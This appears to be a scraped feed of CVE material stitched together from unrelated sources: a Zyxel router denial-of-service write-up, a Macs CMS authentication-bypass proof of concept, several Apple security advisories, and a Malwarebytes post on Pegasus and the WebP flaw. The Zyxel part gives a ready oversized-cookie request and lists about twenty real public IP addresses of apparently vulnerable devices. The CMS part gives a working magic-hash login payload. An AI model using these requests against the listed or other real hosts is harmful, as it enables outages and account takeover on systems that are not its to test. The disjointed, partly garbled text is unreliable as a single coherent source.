Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

**Rumble**

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process：Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:  
1.Vulnerability Address：http://177.221.16.243/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.16.243  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.16.243/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
2.Vulnerability Address：http://179.191.53.240/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.240  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.240/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
3.  
Vulnerability Address：http://179.191.53.133/cgi-bin/login.asp

Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.133  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.133/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

Vulnerability Address：http://177.221.17.76/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.17.76  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.17.76/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

5.Vulnerability Address：http://187.111.205.144/cgi-bin/login.asp  
6.Vulnerability Address：http://179.191.53.138/cgi-bin/login.asp  
7.Vulnerability Address：http://187.111.205.157/cgi-bin/login.asp  
8.Vulnerability Address：http://189.36.156.42/cgi-bin/login.asp  
9.Vulnerability Address：http://179.191.53.15/cgi-bin/login.asp  
10.Vulnerability Address：http://45.182.161.27/cgi-bin/login.asp  
11.Vulnerability Address：http://45.182.161.46/cgi-bin/login.asp  
12.Vulnerability Address：http://45.182.161.42/cgi-bin/login.asp  
13.Vulnerability Address：http://45.182.161.47/cgi-bin/login.asp  
14.Vulnerability Address：http://45.182.161.43/cgi-bin/login.asp  
15.Vulnerability Address：http://45.182.161.25/cgi-bin/login.asp  
16.Vulnerability Address：http://179.191.53.89/cgi-bin/login.asp  
17.Vulnerability Address：http://179.107.195.230/cgi-bin/login.asp  
18.Vulnerability Address：http://45.182.161.41/cgi-bin/login.asp  
19.Vulnerability Address：http://45.182.161.33/cgi-bin/login.asp  
20.Vulnerability Address：http://45.182.161.45/cgi-bin/login.asp

Request package is：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: IP  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://IP/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:  
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

CVE-2023-43291: CVE-2023-43291.md

In Macrob7 Macs Framework Content Management System (CMS) 1.1.4f, loose comparison in "isValidLogin()" function during login attempt results in PHP type confusion vulnerability that leads to authentication bypass and takeover of the administrator account.

**CVE-2023-43154 - Macs Framework v1.1.4f CMS Type Confusion Vulnerability****Table of Contents**

1.  Overview
2.  Proof of Concept
3.  Technical Debrief
4.  Mitigation

**Overview**

**CVE-ID**: CVE-2023-43154

**CVSS 3.1**: 9.8

**Vulnerability Description**: A loose comparison in the isValidLogin() function results in a PHP type confusion vulnerability that can be abused to bypass authentication and takeover the administrator account.

**Vulnerable Parameters**: The username and password of the users on the CMS.

**Affected Products**: Macs Framework v1.14f - Content Management System

**Limitations**:

1.  The username of the victim account must be previously known or a zero-like string
2.  The password used with the account must result in a "magic hash".

**User Interaction Required**: None

**References**: https://github.com/ally-petitt/CVE-2023-43154-PoC

**Discovery Date**: September 7, 2023

**Reported By**: Ally Petitt

**Proof of Concept**

Logging in at the URI /index.php/main/cms/login with the username of the victim account and any password that results in a magic hash will lead to authentication bypass.

A sample login is shown below.

**Send Payload**

    POST /index.php/main/cms/login HTTP/1.1
    Host: 172.17.0.2
    Content-Length: 62
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.17.0.2
    Referer: http://172.17.0.2/index.php/main/cms/login
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=di4ceqcv9432vcb0p27rkh7k82
    Connection: close
    
    ajaxRequest=true&&username=testadmin&password=0gdVIdSQL8Cm&scrollPosition=0
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Sat, 09 Sep 2023 02:01:26 GMT
    Server: Apache/2.4.25 (Debian)
    X-Powered-By: PHP/5.6.40
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: Accept-Encoding
    Content-Length: 72
    Connection: close
    Content-Type: text/html; charset=ISO-8859-1
    
    <script>window.location.href="http://172.17.0.2/index.php/home"</script>
    

The status code of 200 and the redirect to /index.php/home are both indications that the login attempt was successful. The password of testadmin was not the password used in the login attempt (0gdVIdSQL8Cm). Instead, it was set to QNKCDZO.

**Technical Debrief**

When a user attempts to log in, their supplied password is hashed and and sent as a parameter to the isValidLogin() function via the initial login() function that is called when a POST request is made to /index.php/Main/CMS/login.

        public function login()
        {      
          if($this->isValidLogin(Post::getByKey('username'), $this->encrypt(Post::getByKey('password')) ) || ( $this->isAdminLoggedIn() ))
          --snip--
        }
    

The isValidLogin() function begins on line 83 of file /Application/plugins/CMS/controllers/CMS.php. It is vulnerable to a type confusion vulnerability due to its use of 2 equal signs instead of 3.

        private function isValidLogin($username, $password)
        {
          $this->loadModels();
          
          $loggedIn = false;
    
          foreach (Config::$editInPlaceAdmins as $key=>$account)
          {
            if(( $account['username'] == $username) && ($account['password'] == $password ) )
            {
              $loggedIn = true;
              Session::set('AdminLoggedIn', $account);
              break;
            }
          }
    

As shown in the if statement, the username and password are being checked with a loose comparison, leading to a PHP type confusion vulnerability. This can be abused when logging in with a password that results in a magic hash, or hash that is interpretted by PHP to have the value 0 during a loose comparison. A list of such passwords can be found here.

To exploit this, it is important to first understand the format that $account['password'] is stored in. In the function used to save a new user account on line 730 of the aforementioned CMS.php file, it becomes clear that the password is first passed through an encrypt function before it is stored.

      $password = $this->encrypt(Post::getByKey('password'));
      $confirmPassword = $this->encrypt(Post::getByKey('confirmPassword'));
      -- snip --
      private function saveNewUser( $username, $password, $emailAddress, $roleId)
    

Continuing to the function that is called after the password is run through encrypt, the following code is used:

        private function saveNewUser( $username, $password, $emailAddress, $roleId)
        {
          --snip--
                $this->usersModel->insertUser($username, $password, $emailAddress, $roleId);
          --snip--
        }
    

Based on the code above, it is apparent that the "encrypted" password was placed directly into the users Model of the MVC framework. Finally, to exploit this vulnerability, it is necessary to understand how the encrypt function works as its output is being directly compared against the user input.

        private function encrypt( $string )
        {      
          return md5($string);
        }
    

The encrypt function returns the MD5 hash of the string passed to it. This means that when the login() function is called with the user-supplied credentials, the inputted password is hashed and compared against the stored MD5 hash of the victim account.

The implication is that when using a password that results in a PHP collision, or magic hash, it will register as being equivilent when compared against a stored password that also follows the format of a magic hash. As a result, a very large number of passwords can be used to authenticate to and takeover the administrator account, even when the initial password is not previously known.

**Mitigation**

This vulnerability can be mitigated by changing the loose comparison in the isValidLogin() function to a strict comparison by replacing == with ===.

CVE-2023-43154: GitHub - ally-petitt/CVE-2023-43154-PoC: PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6. Apps that fail verification checks may still launch.

Released September 21, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40412: Mohamed GHANNAM (@\_simo36)

CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security

Entry added September 26, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-41071: Mohamed GHANNAM (@\_simo36)

Entry added September 26, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added September 26, 2023

**Biometric Authentication**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-41232: Liang Wei of PixiePoint Security

Entry added September 26, 2023

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-40406: JeongOhKyea of Theori

Entry added September 26, 2023

**CoreAnimation**

Available for: macOS Ventura

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

Description: The issue was addressed with improved checks.

CVE-2023-41992: Bill Marczak of The Citizen Lab at The University of Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to access protected user data

Description: An authorization issue was addressed with improved state management.

CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry added September 26, 2023

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to delete files for which it does not have permission

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry added September 26, 2023

**libxslt**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved memory handling.

CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Entry added September 26, 2023

**Maps**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing (wojciechregula.blog)

Entry added September 26, 2023

**Pro Res**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41063: Certik Skyfall Team

Entry added September 26, 2023

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to overwrite arbitrary files

Description: The issue was addressed with improved bounds checks.

CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added September 26, 2023

**Sandbox**

Available for: macOS Ventura

Impact: Apps that fail verification checks may still launch

Description: The issue was addressed with improved checks.

CVE-2023-41996: Yiğit Can YILMAZ (@yilmazcanyigit) and Mickey Jin (@patch1t)

Entry added September 26, 2023

**Security**

Available for: macOS Ventura

Impact: A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

Description: A certificate validation issue was addressed.

CVE-2023-41991: Bill Marczak of The Citizen Lab at The University of Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

**Share Sheet**

Available for: macOS Ventura

Impact: An app may be able to access sensitive data logged when a user shares a link

Description: A logic issue was addressed with improved checks.

CVE-2023-41070: Kirin (@Pwnrin)

Entry added September 26, 2023

**StorageKit**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: This issue was addressed with improved validation of symlinks.

CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

Entry added September 26, 2023

CVE-2023-41996: About the security content of macOS Ventura 13.6

A permissions issue was addressed with improved validation. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to access sensitive user data.

Released September 18, 2023

**App Store**

Available for: Apple Watch Series 4 and later

Impact: A remote attacker may be able to break out of Web Content sandbox

Description: The issue was addressed with improved handling of protocols.

CVE-2023-40448: w0wbox

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40432: Mohamed GHANNAM (@\_simo36)

CVE-2023-41174: Mohamed GHANNAM (@\_simo36)

CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security

CVE-2023-40412: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-41071: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40399: Mohamed GHANNAM (@\_simo36)

**Apple Neural Engine**

Available for devices with Apple Neural Engine: Apple Watch Series 9 and Apple Watch Ultra 2

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

**AuthKit**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved handling of caches.

CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

**Bluetooth**

Available for: Apple Watch Series 4 and later

Impact: An attacker in physical proximity can cause a limited out of bounds write

Description: The issue was addressed with improved checks.

CVE-2023-35984: zer0k

**bootp**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau (ZeroClicks.ai Lab)

**CFNetwork**

Available for: Apple Watch Series 4 and later

Impact: An app may fail to enforce App Transport Security

Description: The issue was addressed with improved handling of protocols.

CVE-2023-38596: Will Brattain at Trail of Bits

**CoreAnimation**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

**Dev Tools**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2023-32396: Mickey Jin (@patch1t)

**Game Center**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access contacts

Description: The issue was addressed with improved handling of caches.

CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access sensitive user data

Description: A permissions issue was addressed with improved validation.

CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

**libpcap**

Available for: Apple Watch Series 4 and later

Impact: A remote user may cause an unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2023-40400: Sei K.

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to delete files for which it does not have permission

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access protected user data

Description: An authorization issue was addressed with improved state management.

CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxslt**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved memory handling.

CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

**Maps**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing (wojciechregula.blog)

**MobileStorageMounter**

Available for: Apple Watch Series 4 and later

Impact: A user may be able to elevate privileges

Description: An access issue was addressed with improved access restrictions.

CVE-2023-41068: Mickey Jin (@patch1t)

**Passcode**

Available for: Apple Watch Ultra (all models)

Impact: An Apple Watch Ultra may not lock when using the Depth app

Description: An authentication issue was addressed with improved state management.

CVE-2023-40418: serkan Gurbuz

**Photos Storage**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access edited photos saved to a temporary directory

Description: The issue was addressed with improved checks.

CVE-2023-40456: Kirin (@Pwnrin)

CVE-2023-40520: Kirin (@Pwnrin)

**Safari**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to identify what other apps a user has installed

Description: The issue was addressed with improved checks.

CVE-2023-35990: Adriatik Raci of Sentry Cybersecurity

**Safari**

Available for: Apple Watch Series 4 and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A window management issue was addressed with improved state management.

CVE-2023-40417: Narendra Bhati From Suma Soft Pvt. Ltd.

**Sandbox**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to overwrite arbitrary files

Description: The issue was addressed with improved bounds checks.

CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

**Share Sheet**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access sensitive data logged when a user shares a link

Description: A logic issue was addressed with improved checks.

CVE-2023-41070: Kirin (@Pwnrin)

**Simulator**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to gain elevated privileges

Description: The issue was addressed with improved checks.

CVE-2023-40419: Arsenii Kostromin (0x3c3e)

**StorageKit**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read arbitrary files

Description: This issue was addressed with improved validation of symlinks.

CVE-2023-41968: Mickey Jin (@patch1t) and James Hutchins

**TCC**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-40424: Arsenii Kostromin (0x3c3e), Joshua Jewett (@JoshJewett33), and Csaba Fitzl (@theevilbit) of Offensive Security

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 249451  
CVE-2023-39434: Francisco Alonso (@revskills), and Dohyun Lee (@l33d0hyun) of PK Security

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong Kim(@nevul37)

CVE-2023-40429: About the security content of watchOS 10

A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to read sensitive location information.

CVE-2023-40384: About the security content of iOS 17 and iPadOS 17

This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 17. An attacker with JavaScript execution may be able to execute arbitrary code.

Released September 26, 2023

**Safari**

Available for: macOS Monterey and macOS Ventura

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A window management issue was addressed with improved state management.

CVE-2023-40417: Narendra Bhati From Suma Soft Pvt. Ltd, Pune (India)

**WebKit**

Available for: macOS Monterey and macOS Ventura

Impact: An attacker with JavaScript execution may be able to execute arbitrary code

Description: This issue was addressed with improved iframe sandbox enforcement.

WebKit Bugzilla: 251276  
CVE-2023-40451: an anonymous researcher

**WebKit**

Available for: macOS Monterey and macOS Ventura

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

**WebKit**

Available for: macOS Monterey and macOS Ventura

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong Kim(@nevul37)

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 261544  
CVE-2023-41993: Bill Marczak of The Citizen Lab at The University of Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

CVE-2023-40451: About the security content of Safari 17

This issue was addressed with improved checks. This issue is fixed in Xcode 15, tvOS 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to gain elevated privileges.

This document describes the security content of Xcode 15.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Xcode 15**

Released September 18, 2023

**Dev Tools**

Available for: macOS Ventura 13.5 and later

Impact: An app may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2023-32396: Mickey Jin (@patch1t)

**GPU Drivers**

Available for: macOS Ventura 13.5 and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2023-40391: Antonio Zekic (@antoniozekic) of Dataflow Security

**iTMSTransporter**

Available for: macOS Ventura 13.5 and later

Impact: An app may be able to access App Store credentials

Description: This issue was addressed by enabling hardened runtime.

CVE-2023-40435: James Duffy (mangoSecure)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: September 26, 2023

CVE-2023-32396: About the security content of Xcode 15

A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14. An app may be able to access sensitive user data.

CVE-2023-23495: About the security content of macOS Sonoma 14

Categories: Android
Categories: Apple
Categories: Exploits and vulnerabilities
Tags: Pegasus

Tags:  spyware

Tags:  nso

Tags:  webp

Tags:  libwebp

Tags:  buffer overflow

The company behind the infamous Pegasus spyware used a vulnerability in almost every browser to plant their malware on victim's devices.



(Read more...)




The post Pegasus spyware and how it exploited a WebP vulnerability appeared first on Malwarebytes Labs.

Recent events have demonstrated very clearly just how persistent and wide-spread the Pegasus spyware is. For those that have missed the subtle clues, we have tried to construct a clear picture. We attempted to follow the timeline of events, but have made some adjustments to keep the flow of the story alive.

On September 12, 2023 we published two blogs urging our readers to urgently patch two Apple issues which were added to the catalog of known exploited vulnerabilities by the Cybersecurity & Infrastructure Security Agency (CISA), and to apply an update for Chrome that included one critical security fix for an actively exploited vulnerability.

The vulnerabilities were discovered as zero-days by CitizenLab, while checking the device of an individual employed by a Washington DC-based civil society organization with international offices. The exploit chain based on these vulnerabilities was capable of compromising devices without any interaction from the victim and were reportedly used by the NSO Group to deliver its infamous Pegasus spyware.

Both of the vulnerabilities, CVE-2023-41064 and CVE-2023-4863 were based on a heap buffer overflow in Libwebp, the code library used to encode and decode images in the WebP format. This library can be used in other programs, such as web browsers, to add WebP support.

Security expert Ben Hawkes figured out that the vulnerability was to be found in the "lossless compression" support for WebP, sometimes known as VP8L. A lossless image format can store and restore pixels with 100% accuracy, and WebP does this using an algorithm called Huffman coding.

As we saw in the vulnerability descriptions, both vulnerabilities were buffer overflow issues. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region.

The vulnerable versions of libwebp use memory allocations based on pre-calculated buffer sizes from a fixed table, and then construct the necessary Huffman tables directly into that allocation. By creating specially crafted image files that tricked libwebp into creating tables that were too small to contain all the values, the data would overflow into other memory locations.

Even a weathered security expert like Ben Hawkes, who figured out where the problem was, had a hard time finding a way to exploit this issue. Let alone how hard it must have been when there was no clue that a vulnerability even existed. It helps that libwebp is an open source library, so anyone interested can review the code. Ben explained that even extensive fuzzing had never revealed the problem.

Someone, or a group of people, must have taken it upon themselves to really dive into the code. Ben wrote:

> “In practice, I suspect this bug was discovered through manual code review. In reviewing the code, you  would see the huffman\_tables allocation being made during header parsing of a VP8L file, so naturally you would look to see how it's used. You would then try to rationalize the lack of bounds checks on the huffman\_tables allocation, and if you're persistent enough, you would progressively go deeper and deeper into the problem before realizing that the code was subtly broken. I suspect that most code auditors aren't that persistent though -- this Huffman code stuff is mind bending -- so I'm impressed.”

Then again, seeing the amount of money that one could cash in for a fully functional exploit chain, there should be more than enough people willing to put in the work and shove their conscience aside.

_20 million dollar for top-tier full-chain mobile exploits_

